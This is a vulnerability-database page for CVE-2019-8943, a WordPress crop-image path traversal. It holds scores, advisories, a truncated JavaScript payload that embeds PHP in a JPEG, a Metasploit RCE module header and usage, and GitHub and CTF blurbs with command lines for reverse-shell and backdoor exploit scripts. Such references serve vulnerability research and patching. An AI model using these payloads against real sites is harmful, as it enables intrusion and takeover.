CVE-2019-8943

Published: 20/02/2019 Updated: 23/02/2021
CVSS v2 Base Score: 4 | Impact Score: 2.9 | Exploitability Score: 8
CVSS v3 Base Score: 6.5 | Impact Score: 3.6 | Exploitability Score: 2.8
VMScore: 455
CVSS v2 Vector: AV:N/AC:L/Au:S/C:N/I:P/A:N

Vulnerability Summary

WordPress up to and including 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.

Vulnerable Product: wordpress (vendor: wordpress)

Vendor Advisories

Debian Bug report logs - #923583 wordpress: CVE-2019-8943. Package: src:wordpress; Maintainer for src:wordpress is Craig Small <csmall@debian.org>; Reported by: Salvatore Bonaccorso <carnil@debian.org>; Date: Sat, 2 Mar 2019 13:15:04 UTC; Severity: important; Tags: security, upstream; Found in version wordpress/5.0.3+df ...
WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring ...

Exploits

var wpnonce = ''; var ajaxnonce = ''; var wp_attached_file = ''; var imgurl = ''; var postajaxdata = ''; var post_id = 0; var cmd = '<?php phpinfo();/*'; var cmdlen = cmd.length; var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x0 ...
## # This module requires Metasploit: metasploit.com/download # Current source: github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super(update_info( ...

Metasploit Modules

WordPress Crop-image Shell Upload

This module exploits a path traversal and a local file inclusion vulnerability on WordPress versions 5.0.0 and <= 4.9.8. The crop-image function allows a user, with at least author privileges, to resize an image and perform a path traversal by changing the _wp_attached_file reference during the upload. The second part of the exploit will include this image in the current theme by changing the _wp_page_template attribute when creating a post. This exploit module only works for Unix-based systems currently.

msf > use exploit/multi/http/wp_crop_rce
msf exploit(wp_crop_rce) > show targets
    ...targets...
msf exploit(wp_crop_rce) > set TARGET <target-id>
msf exploit(wp_crop_rce) > show options
    ...show and set options...
msf exploit(wp_crop_rce) > exploit

Github Repositories

recon: add blog.thm to /etc/hosts. nmap. SMB: found SMB open, tried enumeration: smbclient -L 101014208. Found a shared folder called "BillySMB": smbclient //101014208/BillySMB. Once inside, dumped everything directly: prompt off; mget *. Checked whether the image files use steganography: steghide --info <filename>. There is something, but it tells you outright that it is a rabbit hole; still, ...

WEB02 WHITEHAT 30. This challenge is based on the vulnerability in WordPress version 5.0.0 (CVE-2019-8943). Through this challenge, everyone will probably see the importance of playing CTF. Some people say CTF is not practical and not worth spending time on. CTF is indeed only ...

CVE-2019-8943 WordPress Crop-Image

WordPress Crop-Image CVE-2019-8943. A python3 script for WordPress Crop-Image CVE-2019-8943 Authenticated Remote Code Execution (RCE). It drops a malicious PHP backdoor. Getting Started / Executing program. RCE: python3 wp_rce.py -t wordpressrce/ -u admin -p password -m twentytwenty. Help: for the help menu run python3 wp_rce.py -h

THM Medium CTF

Blog Writeup (TryHackMe) - by yag1n3. Room Info. Room Labels: CVE-2019-8943, WordPress, Blog, Web. Room Objectives: root.txt, user.txt. Where was user.txt found? What CMS was Billy using? What version of the above CMS was being used? Reconnaissance: Nmap. A WordPress site and some Samba. Samba: we use enum4linux to retrieve some information. We are able to access the share BillySMB wi

A simple PoC for WordPress RCE (author privilege), refer to CVE-2019-8942 and CVE-2019-8943.

Summary: A simple PoC for WordPress RCE (author privilege), refer to CVE-2019-8942 and CVE-2019-8943. Affected Version: WordPress <= 4.9.8 (verified), WordPress <= 5.0.0. Test Environment: Docker Image: docker pull avfisherdocker/wordpress:4.9.8; docker run -d -p 80:80 avfisherdocker/wordpress:4.9.8. MySQL & WordPress Info: Type, Username, Password: mysql

WordPress 5.0.0 Crop-image Remote Code Execution. Description: The exploit code leverages the CVE-2019-8943 and CVE-2019-8942 vulnerabilities to gain remote code execution on WordPress 5.0.0 and <= 4.9.8. Usage: root@kali:~# python3 poc.py --url mysite.com -u kwheel -p qwerty -lhost 101062 -lport 443 [*] Authenticating to wordpress [+] Login successful [*] Uploadi

cve-2019-8942, cve-2019-8943

WordPress Image CROP RCE analysis report. PoC & Dockerfile: github.com/synod2/WP_CROP_RCE. This document covers CVE-2019-8942 and CVE-2019-8943, known as WordPress Image CROP RCE, vulnerabilities found in WordPress versions before 4.9.9 and 5.0.1. CVE number | Disclosure date | Description: CVE-2019-8942 | 2019-2-19 | wp_postmeta table value ...

WordPress 5.0.0 Crop-image Remote Code Execution. Description: The exploit code leverages the CVE-2019-8943 and CVE-2019-8942 vulnerabilities to gain remote code execution on WordPress 5.0.0 and <= 4.9.8. Installation: git clone github.com/ret2x-tools/poc-wordpress-500.git; pip install -r requirements.txt. Usage: root@parrot:~#

Exploit of CVE-2019-8942 and CVE-2019-8943

CVE-2019-8943 WordPress 5.0.0 - Image Remote Code Execution. Exploit of CVE-2019-8942 and CVE-2019-8943 using python. ExploitDB: www.exploit-db.com/exploits/49512. The original exploit for Metasploit: WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit): www.exploit-db.com/exploits/46662. Video: Description: The video below demonstrates how an attacker

CVE-2019-8942 and CVE-2019-8943: WordPress RCE (author privilege). Overview: CVE-2019-8942 is a vulnerability that abuses an LFI bug combined with the File Upload feature to achieve RCE on a WordPress web server with author privileges. Affected WordPress versions include those before 4.9.9 and 5.x before 5.0

Some exploits I have written to showcase and to share

exploits. Some exploits I have written to showcase and to share. All exploits are for vulnerabilities that have been fixed for months prior to release and are not meant to be used for exploitation in any way, but for educational purposes only. Here is the list of the exploits you can find here: CVE | Software | Impact | Write-Up: CVE-2021-27889+CVE-2021-27890 | MyBB | XSS to RCE | htt

Embark on my CTFs Journey, where I document my conquests and lessons learned while navigating the dynamic challenges of Capture The Flag contests. From cracking codes to outsmarting puzzles, join me in exploring the diverse landscape of cybersecurity challenges.

Description: Welcome to my personal Capture The Flags (CTFs) repository! This repository is created to track my progress, achievements, and detailed notes regarding cybersecurity challenges, especially on popular platforms like TryHackMe, Hack The Box and Rootme. Contents: This repository contains an organized list of CTF Machines that I have successfully exploited. Each entry in

DerpNStink CTF Walkthrough

DerpNStink. DerpNStink CTF walkthrough. 1. VM setup. Download the VM: www.vulnhub.com/entry/derpnstink-1,221/ 2. Port scan. # Nmap 7.91 scan initiated Wed Apr 21 17:14:59 2021 as: nmap -n -P0 -p- -sC -sV -O -T5 -oA full 192.168.56.105 Nmap scan report for 192.168.56.105 Host is up (0.00072s latency). Not shown: 65532 closed ports PORT STA

WordPress Pen Testing

Project - WordPress Pen Testing. Time spent: 16 hours spent in total. Objective: Find, analyze, recreate, and document five vulnerabilities affecting an old version of WordPress. Pen Testing Report: 1. WordPress <= 4.2 - Unauthenticated Stored Cross-Site Scripting (XSS). Summary: Vulnerability types: Cross-Site Scripting (XSS). Tested in version: 4.2.0. Fixed in versi

A Mashup of Security Knowledge Bases

SecBooks: a collection of articles from the major knowledge bases and WeChat public accounts; some knowledge bases are deployed with gitbook, some public accounts mainly publish scattered articles. Plugins used: "hide-element", "back-to-top-button", "-lunr", "-search", "search-pro", "splitter". # table-of-contents auto-generation plugin (book.sm): npm install -g gitbook-summ

PoC in GitHub 2021. CVE-2021-1056 (2021-01-07): NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure. pokerfaceSad/CVE-2021-1056 CVE-2021-

PoC in GitHub 2020. CVE-2020-0014 (2020-02-13): It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable. This could lead to a local escalation of privilege with no additional execution privileges needed. User action is needed for exploitation. Product: Android. Versions: Android-8.0, Android-8.1, Android-9, Android-10. Android